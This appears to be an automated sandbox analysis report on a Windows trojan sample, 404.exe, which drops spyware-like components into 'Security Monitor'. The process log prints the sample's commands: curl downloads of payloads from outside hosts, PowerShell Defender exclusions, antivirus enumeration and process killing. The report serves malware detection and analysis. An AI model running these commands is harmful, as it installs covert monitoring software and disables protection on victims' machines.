Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: 71_3_029E15F3	71_3_029E15F3

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: String function: 033C565C appears 36 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00233850 appears 34 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00243380 appears 48 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00266FB0 appears 191 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00243610 appears 43 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 004BD1E8 appears 58 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00239DB0 appears 70 times
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe	Code function: String function: 00267140 appears 140 times

Source: 404.tmp.12.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 404.tmp.12.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-83S41.tmp.13.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-83S41.tmp.13.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-F1LPA.tmp.13.dr	Static PE information: Resource name: RT_BITMAP type: DOS executable (COM)
Source: is-F1LPA.tmp.13.dr	Static PE information: Resource name: RT_STRING type: COM executable for DOS
Source: is-F1LPA.tmp.13.dr	Static PE information: Resource name: RT_RCDATA type: COM executable for DOS

Source: is-F1LPA.tmp.13.dr	Static PE information: Number of sections : 13 > 10
Source: ffws.exe.51.dr	Static PE information: Number of sections : 11 > 10
Source: is-DN3K6.tmp.13.dr	Static PE information: Number of sections : 18 > 10
Source: is-KK513.tmp.13.dr	Static PE information: Number of sections : 11 > 10
Source: is-A63B5.tmp.13.dr	Static PE information: Number of sections : 13 > 10

Source: 404.exe, 00000000.00000000.1309401583.0000000000148000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesfk.exe4 vs 404.exe
Source: 404.exe, 00000000.00000002.1647791601.000000000067E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 404.exe
Source: 404.exe, 0000000C.00000003.1712556211.000000007FE3C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 404.exe
Source: 404.exe, 0000000C.00000003.1712113818.00000000024A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs 404.exe

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"

Source: 404.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: is-A63B5.tmp.13.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: is-F1LPA.tmp.13.dr	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: is-A63B5.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0016526442307692
Source: is-A63B5.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-A63B5.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0007161458333333
Source: is-A63B5.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-A63B5.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0003823138297872
Source: is-F1LPA.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0017903645833333
Source: is-F1LPA.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0005696614583333
Source: is-F1LPA.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0008680555555556
Source: is-F1LPA.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.021484375
Source: is-F1LPA.tmp.13.dr	Static PE information: Section: ZLIB complexity 1.0003551136363635

Source: 404.exe, Settings.cs

Base64 encoded string: 'HUXwGsL2qA2Klp4GxVUBZj53IhCCt8FRahOgIF5wxEYiSEtN7bkJKWuhYdnhpIJq4ktEaX6sYgMULWkDwyERY4HDwqInaXGo4qnrUpvjd0tmKZWB2ku0E0SAcqRtPSSAZhZds1rHDewgKe2WTGuymPkDYmPnYBULitMlA1SA1nwjEuy7w3ZIhcXK5WFFmErCKl6aRQWbxu58cB8mxRzdkLmFVComwNWx4uYcxYpgh7TwfXq4XbRVOOa770EPksojXIErlfyYkT4l1zj6UtPU5BjpTad5Ua4yTsYXT8S0m1u3SyGHRG30dTnWiXXLC1DKYGSIbLnVaXrDQoWeUWnNfEU8FCy5lHytxjfMf7pGciZFljG2A20pOznTuSCYWqtSi6OpJK7Vqhu6nOXe445rQJf74LaN4QsuyHgnVZsz3e8pEqpg4hcauBCZbQu7suaZxAHgrtJfMFxvKy3Ne3SXwS8xEGLFouGJDi0EiJyLX6OoNQPlVgcybDmfATbkhEza8nrk7znVFH8yETkx0isISQqA4VDPrNmTHwpihnnf1HtUEwaqsms7VrHs6rolwYm0dorQnBPM3MPLfW4I3VfEeo7Yp5lz8Bsdd20YFKCqWfDIb5Mjvgra1iWypSkqZYN2dvqmffCsSyq7kz6ttBEbTRk4gBsvjUR7RKnoOiEPd8HD0XNzUz6XUviLLvGdwPJ6gspaLReK5y6UJhEIx1asX2nfkcdbckbNzKgHrwoDVwbexOBmr6p4xZjmFJyswCqUXsd8A5aBNXXjbIqVaztf4fZZj2Bh65PSGGHFtClugnraBAL5ccR6RKZ0TEZH42DQIEdUBlkXN88Qx8XjqEFdnSA4qPupmezmkaR5gz4z03sSLIDUpyZzwimzEhnvz4usJVpWqaD0JOltjrsiLaAwE8zBwb17MJA5I8IzcqmOviqi62QVxFjZ37oKfniPiFnAOokjj2FewuBeSRE3KfJHijBJU7TxHXoq4pTRRpv48ElI6J0OioEC4gannaPkiQXYGTil6wlesOHd71MKGFPbTmuYOonzaLVrqMCmjOQvDjSqY6puOEdcB5FchKWRJuDh1Zvuzij0ycXtTEAR82lVq1puGiEZ17mSfux8K34oemnihVJdKFSQIq0AsBnQdK8zzFNhQAHE760EOHNuZkOvpWJy'

Source: classification engine

Classification label: mal52.troj.evad.winEXE@142/1037@15/9

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 65_2_0024A2A0 GetLastError,_errno,strncpy,FormatMessageA,strrchr,strrchr,_errno,_errno,GetLastError,SetLastError,

65_2_0024A2A0

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 51_2_033A7898 GetDiskFreeSpaceA,

51_2_033A7898

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 65_2_00233700 memset,GetLastError,CreateToolhelp32Snapshot,GetLastError,Module32First,Module32Next,CloseHandle,

65_2_00233700

Source: C:\Users\user\Desktop\404.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\404.exe.log

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03

Source: C:\Users\user\Desktop\404.exe

File created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87

Jump to behavior

Source: Yara match	File source: 73.0.spmm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000049.00000000.3114492355.0000000000401000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmp, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"

Source: 404.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: 404.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmd.exe" OR Caption = "wlg.exe" OR Caption = "spmm.exe" OR Caption = "spkl.exe" OR Caption = "spm.exe" OR Caption = "sem.exe" OR Caption = "clv.exe" OR Caption = "akl.exe" OR Caption = "sps.exe" OR Caption = "sime64.exe" OR Caption = "ff.exe" OR Caption = "mrec.exe" OR Caption = "clvhost.exe" OR Caption = "ffws.exe")
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SPM.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\404.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: spkl.exe, 00000033.00000003.3150998279.0000000006ECF000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3247512604.0000000004BF6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);
Source: spkl.exe, 00000033.00000002.3231347372.00000000018C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE if not exists `wlog` (`id` INTEGER PRIMARY KEY AUTOINCREMENT,`sTime`TEXT,`sJSon`TEXT);0.mca"

Source: 404.exe	ReversingLabs: Detection: 76%
Source: 404.exe	Virustotal: Detection: 75%

Source: spkl.exe	String found in binary or memory: NATS-SEFI-ADD
Source: spkl.exe	String found in binary or memory: NATS-DANO-ADD
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: spkl.exe	String found in binary or memory: jp-ocr-b-add
Source: spkl.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: spkl.exe	String found in binary or memory: jp-ocr-hand-add
Source: spkl.exe	String found in binary or memory: ISO_6937-2-add
Source: qrl.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: qrl.exe	String found in binary or memory: dns-ipv4-addr
Source: qrl.exe	String found in binary or memory: dns-ipv6-addr
Source: qrl.exe	String found in binary or memory: false-start
Source: qrl.exe	String found in binary or memory: --dns-ipv4-addr <address>
Source: qrl.exe	String found in binary or memory: --dns-ipv6-addr <address>
Source: qrl.exe	String found in binary or memory: --false-start
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: -h, --help
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: id-cmc-addExtensions
Source: qrl.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: qrl.exe	String found in binary or memory: set-addPolicy
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information
Source: qrl.exe	String found in binary or memory: curl: try 'curl --help' or 'curl --manual' for more information

Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe

File read: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\404.exe "C:\Users\user\Desktop\404.exe"
Source: C:\Users\user\Desktop\404.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"
Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe	Process created: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe"
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '404.*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
